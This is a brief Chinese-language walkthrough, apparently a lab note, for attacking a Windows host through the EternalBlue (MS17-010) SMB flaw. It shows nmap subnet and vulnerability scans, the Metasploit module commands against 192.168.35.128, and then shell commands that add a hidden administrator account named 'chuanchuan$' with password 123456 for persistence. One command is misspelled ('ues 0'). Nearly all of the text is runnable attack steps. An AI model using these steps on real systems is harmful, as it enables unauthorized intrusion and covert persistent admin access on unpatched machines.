一、kali命令行输入ifconfig,查询网段

二、nmap 192.168.35.0/24,扫描网段,并根据信息找出攻击目标IP

三、扫描目标IP是否存在永恒之蓝漏洞
nmap -sV -p445 –script=smb-vuln-ms17-010 192.168.35.128

四、进入msfconsole并执行永恒之蓝漏洞
1、search ms17-010 查找ms17-010
2、ues 0 使用模块序号0
3、set rhost 192.168.35.128 设置攻击目标的IP
4、run 执行


五、shell切近CMD
chcp 65001解决中文乱码
net user chuanchuan$ 123456 /add 创建用户chuanchuan,密码123456的影子用户
net localgroup administrators chuanchuan$ /add 加入管理用户组,提升权限
net user 查询目标主机用户信息


